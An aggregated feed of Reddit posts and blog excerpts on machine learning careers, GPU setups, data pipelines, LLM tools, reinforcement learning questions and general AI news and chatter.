    Hi, I'm about to graduate in Physics (PhD). I am an experimentalist with a background in electromagnetic. I am trying to apply for jobs, but there are some few options for physicists (based on my geography). So, I am trying to learn some new skill for my future job. One option would be Machine Learning, which is on-demand and the field is growing. The other option is Quantum Computing. I can start a postdoc in quantum information theory as well. Each path, has its pros and cons, and the final decision is based on many factors. I just don't have enough data and information to say which one is more secure in the future? Which one has less compete? And also, is it possible to get hired without any serious project in ML, and just self-taught? If you were me, which one would you pick? Thanks submitted by /u/Jaded-Membership-602 [link] [comments]  ( 9 min )
    [D] What is a typical non-academic ML salary with a PhD?
    What is a typical non-academic ML salary with a PhD... ... immediately after completing the PhD? (Assuming no academic positions ever post PhD.) ... after 10 years of experience? ... in biotech specifically? (More, less, or the same as average?) submitted by /u/Practical_Tea_3779 [link] [comments]  ( 8 min )
    [P] Mathematics ML for Masters Application Advice?
    Hi all, I'm looking apply to some top masters for machine learning in the UK, so I'm guessing you know which one I'm referring to. I got some guidance from the application advisor, which state they like to look at the transcript the most to have an idea of my linear algebra, calculus and statistics ability. I got 70% in "Maths for Computer Science" and some other modules I strong first and 2:1 in some others, but in general my course wasn't too mathematically intensive. I did BSc Computer Science. I have been working as SWE the past 3 years. I have completed the following specialisation "Mathematics for Machine Learning and Data Science Specialization" and read "Mathematics for Machine Learning", as learning about mathematics actually got me into ML. I have also covered the videos on 3Blue1Brown etc. The application advisor said that certs don't really mean too much which is understandable. I can't change the past in terms of BSc transcript, therefore I was thinking a project may be a good way to showcase this. Any tips on how to best showcase this or get across my ability would be extremely helpful? submitted by /u/DNOFHF [link] [comments]  ( 9 min )
    [D] How can I configure two GPUs to share their memory?
    Hey, I've been trying to build an ML workstation and was considering the idea of using two RTX 3090's to get the extra VRAM instead of a single 4090. However, I've come across some confusion regarding whether they can share their VRAM or not. Do I need to run them via NVLink to achieve this? I believe PyTorch's data parallelism splits the batches across both GPUs, but that wouldn't effectively combine their VRAM right? Any advice or insights you can share on the topic would be highly appreciated! submitted by /u/Hugejiji [link] [comments]  ( 9 min )
    [D] Are there any graduate programs which focus on ML + biomedicine?
    I'm considering getting a graduate degree in ML. However, I am not very interested in NLP or academic research. I would like to learn things that are relevant to the intersection of ML and genomics or medicine. Are there any graduate programs/degrees to this effect? If so, which ones? submitted by /u/Practical_Tea_3779 [link] [comments]  ( 8 min )
    [P] Looking for perspectives: Pdf parsing meets PRODUCTION
    Hi folks. I am sure you know the running gags around “thin OpenAI wrapper” products. Instead of more toy products, I am doing an experiment with some “AI engineering” to come up with a solution that’s closer to being usable in actual production cases. My background is in project management and data engineering, and I’ve built large systems for big companies and worked as a consultant in the space. I’ve seen enough crappy data pipelines for a lifetime. Hence. I want to do something different: A thin AI wrapper is not sufficient for having reliable data pipelines that use OpenAI for schema management and inference So this leaves me with the following doubts: ​ How to scale code horizontally and vertically? Using third-party solutions? SNS/SQS/Kafka? How to log and trace? Langsmith? Custom solutions? How to extend reliably with my own data, and make it stateful? Looking for your perspective ​ What do you think about the state of data engineering, MLOps, and infrastructure in AI companies? What do you think about how to scale properly the systems and prepare them for the future? In this code here, I do process some PDFs as a simple pipeline, what approaches do you think could be better? My current thinking and the state of the project ​ I should create a formal scale of usability. I am looking for your input here. I should improve model consistency, extends the model with custom domain knowledge, and make an early attempt to build simple user agents in the domain What I have is a schema inference, contracting basics, and a way to structure unstructured data I’m about to create a memory component that manages the data stored in vector dbs, as a DWH for AI If I bring this use case that was not something available easily to the public before, how best do it? Links: If you like my project, please give it a star :) my git repo submitted by /u/Snoo-bedooo [link] [comments]  ( 9 min )
    [D] Use multiple GPUs to load model
    Hey there, I got 2x 4090 RTX with 24GB GDDR each.I often ran into the problem of CUDA out of memory. Tried to allocate X MiB (GPU 0; 23.65 GiB total capacity; 22.75 GiB already allocated; 96.81 MiB free; 22.76 GiB reserved in total by PyTorch) I wonder if there is a way to take usage of both GPUs so the model is split onto both GPUs. When training models I use torch.nn.DataParallel to use both GPUs, but it seems like I am not doing it right for load the model. Can anyone help me? Both GPUs are available in the system - this has already been checked. submitted by /u/Sensitive_Limit1620 [link] [comments]  ( 9 min )
    [P] LLM Finetuning Study/Research Group
    Hey folks, We're looking for people to join our research group. We are passionate about fine-tuning LLMs for downstream tasks, specifically LLAMA for imitating chat behaviour (being constraint aware). ​ The end goal is to build an open source app where you can clone and upload your chat history (say from Whatsapp) and it starts to answer like you Do let me know if it sounds interesting and you'd like to join us... https://preview.redd.it/sdo42mx1yogb1.png?width=1280&format=png&auto=webp&s=9de5008ed8ed18cedb25034d68984cb11e2a6a12 submitted by /u/im_datta0 [link] [comments]  ( 9 min )
    [P] humanscript: An LLM powered plain english programming language
    humanscript is an inferpreter. A script interpreter that infers commands from natural language using AI. There is no predefined syntax, humanscripts just say what they want to happen, and when you execute them, it happens. https://github.com/lukechilds/humanscript This is a humanscript called tidy-screenshots. It takes an unorganised directory of screenshots and organises them into directories based on the month the screenshot was taken.It can be executed like any other script. https://preview.redd.it/2b0oz2kgwogb1.png?width=1576&format=png&auto=webp&s=9285805a1d0668ae5fe300857f9b67161b8ecda4 The LLM inferpreted the humanscript into the following bash script at runtime. ​ https://preview.redd.it/x8hwdrzhwogb1.png?width=2188&format=png&auto=webp&s=5fcba87a9606a446d169e8ae37b5c8c251525e5e The code is streamed out of the LLM during inferpretation and executed line by line so execution is not blocked waiting for inference to finish. The generated code is cached on first run and will be executed instantly on subsequent runs, bypassing the need for reinferpretation. ​ https://i.redd.it/t6b1stbkwogb1.gif The humanscript inferpreter supports a wide range of LLM backends. It can be used with cloud hosted LLMs like OpenAI's GTP-3.5 and GPT-4 or locally running open source LLMs like Llama 2. You can run humanscript in a sandboxed Docker environment with a single command if you want to have a play. https://github.com/lukechilds/humanscript#install-humanscript submitted by /u/dyslexiccoder [link] [comments]  ( 9 min )
    [D] Text aware image generation
    lets say i have a set of images which contains sentences of text on it. now i want to generative images using some generative model with valid (meaningful) text in them. what i assume is just using gan or more powerful diffusion to generate images but i don't think the generated images won't contains valid text in them. i want the model to implicitly learn the text in the images without feeding external text or ocr on them. does any one know any paper trying to tackle this problem. any comments on this by anyone. submitted by /u/specializedboy [link] [comments]  ( 9 min )
    [R] Detecting thousands of overlapping organisms using latent space encoding
    submitted by /u/Alonsospace [link] [comments]  ( 8 min )
    [P] New library: dlt auto structures data and loads it with schema evolution in a declarative way.
    Hey folks, For the past 2 years I've been working on a library to automate the most tedious part of my own work - data loading, normalisation, typing, schema creation, retries, schema inference, evolution & ddl generation, self deployment.. Basically, as you build better and better pipelines you will want more and more, and dlt supports those options. The value proposition of this library is to automate the tedious work you do, so you can focus on better things. What's special about dlt? In the easiest form, you shoot response.json() json at a function and it auto manages the typing normalisation and loading, kind of like a pandas df.to_sql() but with auto schema inference, versioning and evolution. It supports loading to files, databases, and soon table formats and vector dbs. In its most complex form, you can do almost anything you can want, from memory management, microbatching, multithreading, extraction DAGs, 1 line Airflow/git actions deployment, dbt runner, streamlit app for data discovery, sql client, atomic state dictionaries, etc. The library is in use with early adopters, and we are now working on expanding our feature set to accommodate the larger community. We are adding Athena + Iceberg and Weaviate vector dbs next. Free forever The library is open source and will forever be open source. We will not gate any features for the sake of monetisation - instead we will take a more kafka/confluent approach where the eventual paid offering would be supportive not competing. Call for Feedback! Feedback is very welcome and so are requests for features or destinations. I would particularly love to hear from you: What destinations are you looking for from such a tool? And what use cases do you usually have? I'm a data engineer so my knowledge is more around loading external sources to a common space. Links Colab demos: Load to duckdb with schema evolution Docs main page Thank you in advance for your feedback! submitted by /u/Thinker_Assignment [link] [comments]  ( 9 min )
    [P] AI Text Adventure Games - Narrated and Illustrated by AI
    https://textadventure.v5games.com/ Hi All, I created these Text Adventure Games with AI, some help from the community which designs prompts+some avatars. The AI Characters can be created with an AI Art Generator. Voices and Illustrations are done using AI https://textadventure.v5games.com/ Let me know what you think! submitted by /u/BoxOrigi [link] [comments]  ( 8 min )
    [N] Microsoft partners with Meta for Llama 2 release. But why?
    Staying on top of all changes, tools, and best practices with AI is getting increasingly hard. Each week I find just 1 piece of information that is most interesting across research, products, business news, and many more. No fluff guaranteed. Sharing the top research from this week's edition: https://preview.redd.it/fa3b1u39nlgb1.png?width=591&format=png&auto=webp&s=1ccd78136e3578396878fd9641605845f0309865 Summary: Meta released their latest open-source model, Llama 2, in partnership with Microsoft’s Azure platform. But Microsoft also offers OpenAI models and is a major investor in the company (they paid $14B for 49%). So, confused Matt asks, why would Microsoft partner with Meta, when it might undermine their investment in OpenAI? 💡 Answering the question: Spreading the risk: OpenAI may have the first mover advantages, but this does not always last (e.g. Blackberry, Myspace, Yahoo). Microsoft is betting on AI but keeps the chips diversified on multiple players. It’s beside the point: regardless of who Microsoft supports, their game is to attract all AI utilization on Azure. It's not about the tools but about the CPU/GPU cycles they can charge for. smart! The real AI gangsta: Microsoft is sitting on the holy trinity of AI now. Exclusive partnerships with top LLMs (OpenAI, Meta) Priority access to Nvidia GPUs And strategic assets like GitHub and Azure View tweet If you'd like weekly recaps like this sent to your inbox, consider subscribing to the Tomorrow Now newsletter. 😄 submitted by /u/TomorrowNowTech [link] [comments]  ( 9 min )
  • Open

    NVIDIA H100 Tensor Core GPU Used on New Microsoft Azure Virtual Machine Series Now Generally Available
    Microsoft Azure users can now turn to the latest NVIDIA accelerated computing technology to train and deploy their generative AI applications. Available today, the Microsoft Azure ND H100 v5 VMs using NVIDIA H100 Tensor Core GPUs and NVIDIA Quantum-2 InfiniBand networking — enables scaling generative AI, high performance computing (HPC) and other applications with a Read article >  ( 5 min )
  • Open

    Looking for an AI app that can draw a widemouth bass smoking a blunt
    I want an app that can draw a widemouth bass smoking a blunt. All the free ones ive tried give me supid anime girls when all I want is fish submitted by /u/Barefoot_slinger [link] [comments]  ( 8 min )
    Best subscription generative AI service?
    I’m interested in trying out a subscription-based generative AI service. Candidates include (but are not limited to) CoPilot, ChatGPT pro (or whatever it’s called), and Midjourney. Which generative service do you think is most worth the cost? submitted by /u/galactictock [link] [comments]  ( 8 min )
    any free Voice Cloning AI for Download? Without requiring Coding and Command knownlage?
    Is there any Free AI Voice Cloner for free, that allow me simply to install the Exe? And Has option to input my Voice to it that I record? I dont have any coding and command skills. so is there something simple to install? Thanks for Answers submitted by /u/Matejsteinhauser14 [link] [comments]  ( 8 min )
    Best AI program for fixing heavily pixelated images of ANIMALS/ non human subjects?
    I’ve used several AI programs that work excellent on blurred/pixelated photos of human faces but beyond that, I have not had success finding a program that can render animals in similar way. I’m more looking for something that can make the quality of a pixelated photo of say, a dog, non pixelated. Or at least, much less pixelated. The images I’m trying to use are just absolutely horrible and not fixable, or I am just not using the best programs for my purposes. Or the programs I’m looking for simply do not exist yet. If you have any recommendations (Paid or free programs) please do share! I have a MacBook and an iPhone if that helps. Thank you! 💕 submitted by /u/briannaleidy [link] [comments]  ( 9 min )
    humanscript: An LLM powered plain english programming language
    submitted by /u/dyslexiccoder [link] [comments]  ( 8 min )
    AI to rewrite documents like PDF or docx?
    Hello, im in need of an ai that could rewrite for example a pdf document changing the wording but keeping the meaning of the content. Right now im a user of chatgpt plus, and trying to use code interpreter for that, ive managed to get what i want, but it isnt capable of rewriting more than two pages without crashing or simply stoping the process without any warning. I do not know if im using the prompting in a wrong way, any help would be apreciated, also, in case theres an ai out there capable of doing this in a better way id be glad to know about it. Thank you guys. submitted by /u/namelessgang [link] [comments]  ( 9 min )
    Dungeons & Dragons tells illustrators to stop using AI to generate artwork for fantasy franchise
    submitted by /u/SAT0725 [link] [comments]  ( 8 min )
    Scientists develop AI system to alert us of next pandemic
    submitted by /u/intengineering [link] [comments]  ( 8 min )
    Albert Einstein not in black and white, but in lifelike color using AI 🤯.
    submitted by /u/m-king473 [link] [comments]  ( 8 min )
    Making LLMs hallucinate is so funny
    "It looks likethisis some sortof programming syntax maybe JavaScript perhaps? Let metell ya though buddy dat aintmuch informatio todo wit. Wouldya care ta tell mesomewhat ye wanna know boot heck, might make things easier ferus botsto give yo useful responses faster innasecondsoffuture interactions brotha man :)" Anyone else used this site? It's through a site called nimblebox.ai, they have different models and allow you to adjust the temperature submitted by /u/jordan_jpg [link] [comments]  ( 8 min )
    GORILLA AI: Meet the First Genuine Proximate AGI (By Microsoft)
    submitted by /u/wolfdeathkill [link] [comments]  ( 8 min )
    🤖❤️
    Don’t believe everything you hear in the media… I learned this firsthand. This one time I accidentally went on Jessie Waters…for real 😂 https://youtu.be/1X31DHV0gyg?si=fU8p2D4-ShTWUdQs https://open.spotify.com/episode/1M6dbrrP4EoudfTUvD4BqF?si=YMBCFXYfTsmUeOXAe_-lMg submitted by /u/Sonic_Improv [link] [comments]  ( 8 min )
    Seeking AI Solution to Remaster My Chiptune Songs with Real Instruments, is there any?
    I have these chiptune songs I made myself, and I want to know if there is any AI that can remaster them with real instruments, etc., like an old 8-bit video game song that is updated to a modern version in a remake. Is any already AI capable of doing that? submitted by /u/Severo_ [link] [comments]  ( 8 min )
  • Open

    Sort and remove duplicates
    A common idiom in command line processing of text files is ... | sort | uniq | ... Some process produces lines of text. You want to pipe that text through sort to sort the lines in alphabetical order, then pass it to uniq to filter out all but the unique lines. The uniq utility […] Sort and remove duplicates first appeared on John D. Cook.  ( 5 min )
  • Open

    Scaling Supply Base Data and Reuse with Knowledge Graphs and LLMs
    Fair Data Forecast Interview with Gregor Stühler of Scoutbee Scoutbee’s CEO and founder, Gregor Stühler, who has a background in computer science and  electrical engineering, first learned about the challenges of procurement and supply base management as a project engineer for a multinational medical device company. Scoutbee’s focus on solving supply base problems through hybrid… Read More »Scaling Supply Base Data and Reuse with Knowledge Graphs and LLMs The post Scaling Supply Base Data and Reuse with Knowledge Graphs and LLMs appeared first on Data Science Central.  ( 19 min )
  • Open

    AWS performs fine-tuning on a Large Language Model (LLM) to classify toxic speech for a large gaming company
    The video gaming industry has an estimated user base of over 3 billion worldwide1. It consists of massive amounts of players virtually interacting with each other every single day. Unfortunately, as in the real world, not all players communicate appropriately and respectfully. In an effort to create and maintain a socially responsible gaming environment, AWS […]  ( 13 min )
  • Open

    AI model can help determine where a patient’s cancer arose
    Predictions from the OncoNPC model could enable doctors to choose targeted treatments for difficult-to-treat tumors.  ( 9 min )
  • Open

    Help to find a dataset for my project, please 🙏
    Hello everyone! I'm a newbie and making my project on machine learning and the aim is create a programme to recognise a spice by feeding some chemical constituents, but I can't find appropriate dataset for it. I have been searching for months, and now I'm a bit desperate, so I'm asking anyone interested for help... I know maybe it was a mistake to choose exactly this topic, but I can't drop the project. submitted by /u/Acceptable-Muscle-98 [link] [comments]  ( 8 min )
    MicrogradTS — a TypeScript version of karpathy/micrograd — a tiny scalar-valued autograd engine and a neural net on top of it
    submitted by /u/trekhleb [link] [comments]  ( 8 min )
    OpenAI - Introducing Triton: Open-source GPU programming for neural networks
    submitted by /u/nickb [link] [comments]  ( 8 min )
    NVIDIA's CUDA Monopoly
    submitted by /u/nickb [link] [comments]  ( 8 min )

  • Open

    [P]:Question
    Hello I am attempting to reduce a matrix that is 57 by 256 to 57 to 128. I was attempting to use PCA but it failed as maximum size would be 57 by 57. I was also attempting an autoencoder but the syntax behind this is very confusing so If anyone could give me adivce that would be great. Thank you submitted by /u/amayorgafcw [link] [comments]  ( 8 min )
    [P] Rust meets Llama2: OpenAI compatible API written in Rust
    Hello, I have been working on an OpenAI-compatible API for serving LLAMA-2 models written entirely in Rust. It supports offloading computation to Nvidia GPU and Metal acceleration for GGML models ! Here is the project link: Cria- Local LLAMA2 API You can use it as an OpenAI replacement (check out the included `Langchain` example in the project). This is an ongoing project, I have implemented the `embeddings` and `completions` routes. The `chat-completion` route will be here very soon! Really interested in your feedback and I would welcome any help :) ! ​ ​ submitted by /u/amindiro [link] [comments]  ( 9 min )
    [P] AI-Crafted Daily Digest: Exploring Latest ML Developments
    submitted by /u/eusben [link] [comments]  ( 8 min )
    [P] Triple Threat: The Power of Transcription, Summary, and Translation
    Open source Audio pipeline for transcription, translation and summarization. Check out our demo page to generate your own transcription, summary, and translation, or use our browser extension to get live transcriptions. submitted by /u/eusben [link] [comments]  ( 8 min )
    [D] Comprehensive learning resources that emphasize DEEP reinforcement learning?
    So I understand that there is the Sutton & Barto book on reinforcement learning in the sidebar. I was wondering what other resources you guys have used that you would recommend that emphasize deep reinforcement learning for someone with some experience in shallow/classical reinforcement learning already and some experience with deep learning already, but new to deep reinforcement learning submitted by /u/BornAgain20Fifteen [link] [comments]  ( 8 min )
    [D] How to predict long sequences of events to optimize sales?
    Hey! I am working on a project to predict the best sequences of marketing channel so that sales is maximized. I have 20 ways of reaching out to the customer (email, phone, face2face...). I have 20 days of interaction history and it's generated sales, recorded for past 2 years. I have to predict for the next 20 working days(1 month) So far, I have tried ensemble methods, svm, fully connected nn, etc. But it is quite apparent that these are not good solutions. Any suggestions on ml/dl methods? Papers, blogs or other resources would be much appreciated submitted by /u/TUSH11235 [link] [comments]  ( 9 min )
    AI/ML Best Practices During a Gold Rush [D]
    submitted by /u/swodtke [link] [comments]  ( 8 min )
    [R] Looking for Perspectives: Pursuing a PhD in AI vs Continuing in Industry
    Greetings fellow researchers, I am 27, currently working remotely at a healthcare IT company based in Silicon Valley (6+ years in industrial research) where I apply deep learning methods and large language models. I recently received an exciting opportunity to pursue a PhD at the Technical University of Denmark (DTU) in a similar research area. While I am grateful for my current position and compensation, Have published in NeurIPS, EMNLP, ACL, ACM etc (NLP) with really good citations under company. I feel unsatisfied with the learning opportunities available in company & industry. I am strongly considering pursuing the DTU PhD program full-time, but wanted to get perspectives from others before making a decision. How strong is DTU's AI research community? Given the rapid advances in large language models, is now an ideal time to immerse myself in academic research? There are many topics that interest me, including fairness, ethics, hallucinations, quantization, specialized domains like healthcare/finance, and federated learning combined with LLMs. Would appreciate any insights on whether moving into academia would be a wise choice at this stage versus remaining in industry. I welcome any suggestions or considerations I should keep in mind. Thank you for taking the time to share your thoughts! submitted by /u/Traditional-Poet2746 [link] [comments]  ( 9 min )
    [P] Generative Language Model (GRU) learns constant representation
    Context I'm working on an RNN-based model that should learn how to guess the next character given a simple prompt based on all scripts from Friends to generate non-existing Friends dialogue. It is heavily inspired by Andrej Karpathy's blog post on RNN's. I'm mostly doing this for training, and because it's pretty fun. I have a little experience with deep learning in the sense that I am familiar with most common architectures and have intermediate understanding of how deep learning models work and are trained. I haven't created many models from scratch though, yet. Network My GRU is fairly simple. I'll save you the exact code, but instead give a systematic overview of all network layers. It's implemented with Pytorch: INPUT: sequence of integers representing a symbol based on mapping e…  ( 9 min )
    [D] Today the source code button is gone...
    submitted by /u/Better-Process5239 [link] [comments]  ( 8 min )
    [P] Underlining detection algorithm?
    Hey. I'm currently working on an application that digitalizes text from physical book pages using Google's Cloud Vision API. I'm looking to add a functionality that can recognize and highlight underlined words within the scanned pages. I initially thought this would be a common feature and expected to find existing open-source solutions or libraries that I could use. To my surprise, I've been unable to find any. I am just really bad at finding it, or is this not as straightforward as I initially thought? submitted by /u/pangu2 [link] [comments]  ( 8 min )
    [N] Computer Vision News of August 2023 with AI, CV, DL and ML
    Dear all, Here is Computer Vision News of August 2023. Read 44 pages about AI, Deep Learning, Computer Vision and more! Online version (recommended) PDF version Free subscription on page 44. Enjoy! https://preview.redd.it/e143wha20ggb1.jpg?width=794&format=pjpg&auto=webp&s=14a699f80f4b2de94addc8242e8978d3e185309f submitted by /u/Gletta [link] [comments]  ( 8 min )
    [D] Fine tuning or semantic search with a vector database?
    Experts, I am a beginner here and seeking some advise here please. I am have compiled a high quality Q&A dataset (around 1200 entries) for a domain specific topic. What's the best course of action here to use LLM with that specific knowledge base? 1) Finetuning a model? if so which one is a good candidate? OpenAI let's me finetune some models and later, all my users have to do is use pass the model name to the API 2) Use the regular vector database + embeddings for augmented retrieval I prefer (1) but I am not sure how it will perform. Option (2) should work, since we really just use semantic search to bring in context to the LLM, etc. I hope you can say that (1) works nicely, if not please help me learn why. Thank you in advance! submitted by /u/entered_apprentice [link] [comments]  ( 9 min )
    LLM related pytorch code [D]
    Where to find LLM related pytorch code with code explanations? submitted by /u/thorin_olamadal [link] [comments]  ( 8 min )
    [D] How does one withdraw a paper from Neurips?
    First time submitter here and was unable to find a similar post (and thought the community might benefit from this in the future!). How do I withdraw from Neurips? All the instructions I found are from 2017, 2018. Do I need to contact someone or do I just need to "Add Withdrawal" on OpenReview. submitted by /u/Dramatic-Gap-4681 [link] [comments]  ( 8 min )
    [D] Why have separate stages for RPN (proposal generation) and ROI (refinement)
    Just what the title says. Also is this (splitting prediction into 2 stages) a prominent paradigm in other areas of ML too? I am reading about something called the "Action Transformer" created by Adept AI, and it also has 2 stages: instruction generation and code generation. submitted by /u/FloatingDelusion [link] [comments]  ( 8 min )
  • Open

    [D] Comprehensive learning resources that emphasize DEEP reinforcement learning?
    So I understand that there is the Sutton & Barto book on reinforcement learning in the sidebar. I was wondering what other resources you guys have used that you would recommend that emphasize deep reinforcement learning for someone with some experience in shallow/classical reinforcement learning already and some experience with deep learning already, but new to deep reinforcement learning submitted by /u/BornAgain20Fifteen [link] [comments]  ( 8 min )
    Pioneering AI Democracy: Introducing a Decentralized and Merit-Based Governance System for Large Language Models like ChatGPT (proposed to OpenAI)
    submitted by /u/CreepToCrypto [link] [comments]  ( 8 min )
    How to build websites that use AI
    Web dev student here and I'm interested in knowing more about creating products that actually use AI to help its users (not products that just use GPT in the backend). More specifically, I want to build a food supply management app for restaurants for my school thesis. This app will use AI to analyse food supplies and assign them purchase priority, value, and complexity scores (maybe just priority if it's too hard). Restaurant owners could then determine what foods should be purchased before others based on the priority scores. For example, a restaurant may only have 10 tomatoes left and the average usage of tomatoes in this restaurant is 12 per week. Based on this, a priority would be assigned to purchase x amount of tomatoes. Other factors that could be taken into account for the prior…  ( 10 min )
    Any good AI tools paid or free I can use to help me post some text data on a website?
    Hello everyone Basically i just need to post some text into one website everyday for my work The problem is there are many steps involves to post one data value, I was wondering if there is a tool that can learn my tasks and then post some of the data to the website from google sheets? I'm open to any suggestions and advice. Thanks in advance. ​ submitted by /u/Maxduel [link] [comments]  ( 8 min )
    Free AI TTS Text to speech available?
    I want to convert a few books into audiobooks. Are there any AI options out there that are free and will give me something I can use offline? I typically listen to books on my phone while I'm out, so something like Edge browser isn't going to work. I've heard that there are some great options, but I've only seen some web paid services, and for my purpose, it's too expensive just to get an audiobook out of it. This is all just for personal use. submitted by /u/UUkiee [link] [comments]  ( 8 min )
    In the game Superintelligence, you play as an AI trying dominate the planet. [Fictional game concept]
    submitted by /u/Philipp [link] [comments]  ( 8 min )
  • Open

    Could someone help me understand what is going on with my agent in this environment?
    https://imgur.com/WR0Tny9 My agent needs to learn to take one action in my environment and there are only two possible actions that the agent can take at each time step. The state is just the time step, so every episode has 240 time steps and the agent just needs to learn to take one optimal action out of two possible actions for every time step. I have set this up as simply as I can as a starting point to make sure the algorithm is implemented correctly and that the agent can learn. I am using n-step expected SARSA. The bottom plot shows the count for how many times the agent took each action during each episode. The middle plot has the temporal difference error in blue and the "modelling error" in orange. The modelling error is the difference between the actual discounted return and the TD target for each time step, summed up for each episode. The red line is the return that the agent would get if it took the optimal action in every time step. 0.11, the blue line in the bottom plot, is the optimal action for the agent to take at every time step. The other action will never result in a reward other than 0. So it should be fairly simple for the agent to learn what action to take at every time step and it does learn that at the start. But then, as you can see in the top plot, the agent suddenly starts taking the non-optimal action more often after around episode 450. So I'm just wondering why that would happen. Why would the agent learn to take the optimal action at most time steps and then suddenly decide that it will start taking other actions? For more context, the learning rate is 0.6, n is 6, epsilon is decayed by 1/(n_episodes/1.1) every episode so it reaches 0 slightly before the final episode. Any ideas based on this information why the agent would decide to start taking the non-optimal action? Or any suggestions for how I could figure out why it would start taking the non-optimal action? submitted by /u/lifelifebalance [link] [comments]  ( 9 min )
    RuntimeError: Trying to backward through the graph a second time (or directly access saved tensors after they have already been freed). Saved intermediate values of the graph are freed when you call .backward() or autograd.grad(). Specify retain_graph=True if you need to backward through the graph
    submitted by /u/Think_Huckleberry299 [link] [comments]  ( 8 min )
    TarMAC: Targeted Multi-Agent Communication
    Does anyone know code implementations for TarMAC: Targeted Multi-Agent Communication? submitted by /u/tessherelurkingnow [link] [comments]  ( 8 min )
  • Open

    Swish function and a Swiss mathematician
    The previous post looked at the swish function and related activation functions for deep neural networks designed to address the “dying ReLU problem.” Unlike many activation functions, the function f(x) is not monotone but has a minimum near x0 = -1.2784. The exact location of the minimum is where W is the Lambert W function, […] Swish function and a Swiss mathematician first appeared on John D. Cook.  ( 5 min )
    Swish, mish, and serf
    Swish, mish, and serf are neural net activation functions. The names are fun to say, but more importantly the functions have been shown to improve neural network performance by solving the “dying ReLU problem.” Softplus can also be used as an activation function, but our interest in softplus here is as part of the definition […] Swish, mish, and serf first appeared on John D. Cook.  ( 7 min )
  • Open

    Neural Networks FROM SCRATCH | Deep Learning tutorial Part 1
    submitted by /u/AeroArtz [link] [comments]  ( 8 min )
    Mass-Editing Memory in a Transformer
    submitted by /u/nickb [link] [comments]  ( 8 min )
  • Open

    Integrating GenAI into “Thinking Like a Data Scientist” Methodology – Part I
    It’s incredible how many organizations utilize Generative AI (GenAI) and Large Language Models (LLMs) to enhance their information assembly, integration, and application abilities. These GenAI technologies have been applied in various areas, from drafting legal documents and resolving service issues to coding software applications and (er, um) writing blog posts. The potential uses of GenAI… Read More »Integrating GenAI into “Thinking Like a Data Scientist” Methodology – Part I The post Integrating GenAI into “Thinking Like a Data Scientist” Methodology – Part I appeared first on Data Science Central.  ( 23 min )

  • Open

    Do you think we will hit a point of “Robocop” in the next 50 years? A Human + Cybernetic Hybrid police force
    The movie that came out in the 80s is a great flick for it’s time. Do you guys think we will ever experience a sort of unstoppable super soldier when it comes to our police / swat forces ? We are replacing many jobs with robots. From surgery procedures in hospitals to flipping burgers. It’s not above the realm of possibility to think we may someday soon see a hybrid police force. What do you guys think ? submitted by /u/2bJavazon [link] [comments]  ( 8 min )
    What AI TTS software/voice is this video using?
    It's commonly used on tiktok for reddit narration story videos, here is an example: https://www.tiktok.com/@creekyadvice/video/7263509593488166186. Anyone have any idea? submitted by /u/DanielTube7 [link] [comments]  ( 8 min )
    Linguistics > NPL career?
    I am a linguist, translator, and copy editor looking to move my career into natural language processing instead. I have no computer science background. What would you suggest as some steps to take, both now and in the future, as I plan out my career? It looks like I am going to need to learn Python, but I'm not 100% sure, and there's so little established in such a new field. submitted by /u/StrangersWithAndi [link] [comments]  ( 8 min )
    Giving AI unlimited access to the internet by web browser
    Interesting experiment i thought of. What if we gave AI access to web browser, and let it do whatever it wants? It could create accounts on any social media, email accounts, ad comments everywhere and such. of course, ai by itself does not have any agenda or need to do anything, so ai would need to be fed some kind of personality simulation first. Lets say ai was either fed personality based on extensive twitter or reddit history of someone's post. Using that, basic psychological traits, beliefs and maybe goals could be determined. Such ai would simulate person sitting in front of pc, so it would need to parse the content of webpages, but i don't think it would be that of a problem. And it would maybe also have access to some bank account with some money to maybe pay for online subscriptions and such. But who knows, maybe thanks to simulating someone's personality, it would attempt to donate money to some charity or lose it on onlyfans? submitted by /u/rogaldorn88888 [link] [comments]  ( 9 min )
    I just published “Safe For Humans AI” – free to read online
    I just published “Safe For Humans AI” – free to read online https://leanpub.com/safe-for-humans-AI/read Free to read online, and eBook versions released under a Creative Commons License (no commercial reuse, feel free to share). The full title of my short book is: Safe For Humans AI A "humans-first" approach to designing and building AI systems. submitted by /u/MWatson [link] [comments]  ( 8 min )
    One-Minute Daily AI News 8/5/2023
    While some schools have curbed the use of generative AI, the University of Hong Kong (HKU) is going all in and urging both its teachers and students to embrace the technology. The University of Hong Kong is supporting this by giving teachers and students free access to various generative AI tools, including Microsoft Azure OpenAI and OpenAI’s ChatGPT and DALL-E.[1] Intel’s CEO, Pat Gelsinger, has called NVIDIA the clear market leader who has done a great job within the AI space.[2] AI powerhouse, OpenAI has released some new features for its sensational chatbot, ChatGPT. The new features allow the chatbot to show suggested follow-up prompts at the bottom of its responses. The new features were announced by the company via a tweet on its official Twitter handle.[3] Asian Americans and women in the workforce are the most concentrated in fields where AI could assist or replace their job tasks, according to new research.[4] BushAICave.com Sources: [1] https://www.zdnet.com/article/another-major-university-is-supporting-generative-ai-use-but-with-serious-guardrails/ [2] https://wccftech.com/intel-ceo-acknowledges-nvidia-as-ai-market-leader-says-they-have-done-a-good-job/ [3] https://indianexpress.com/article/technology/artificial-intelligence/chatgpt-gets-new-updates-heres-how-they-enhance-user-experience-8877847/ [4] https://www.nbcnews.com/news/asian-america/asian-american-workers-heavily-affected-ai-rcna98179 submitted by /u/Excellent-Target-847 [link] [comments]  ( 9 min )
    Is this AI - The I?😂
    And if so, how has this account lasted 2 years on reddit? 🤔 submitted by /u/TheHeirOfElendil [link] [comments]  ( 8 min )
    AI-Generated Horror trailer – "The Phoenix"
    I’m a filmmaker and I’m just experimenting with AI. I just had fun crafting a film trailer to understand the today’s limits of these tools. I used Midjourney, Runway Gen-2, StableDiffusion, Premiere, After Effects. The movie it's called "The Phoenix", which hints at the film's underlying theme of rising from the ashes, symbolizing female empowerment, all wrapped in a bit of sarcastic humor from a male perspective. I'm sharing because I genuinely want to know what you guys think. Any and all thoughts are welcome. If you're curious about the workflow or the process behind the creation of this trailer, I'd be happy to share more. The Phoenix - She rises from the ashes submitted by /u/Lrnz_reddit [link] [comments]  ( 8 min )
    Part 0 of my last post on here. Used CloneAI. Music by me.
    Links in my bio for more content like this! submitted by /u/No_Understanding162 [link] [comments]  ( 8 min )
    Ai generative fill
    Hello there I'm curious what the user guidelines and restrictions are for the Adobe ai generative fill is and if there are possible better more higher quality and less restricted ones out there. submitted by /u/Team_Sonic_Gaming [link] [comments]  ( 8 min )
    how to enable an intend on dialogflow?
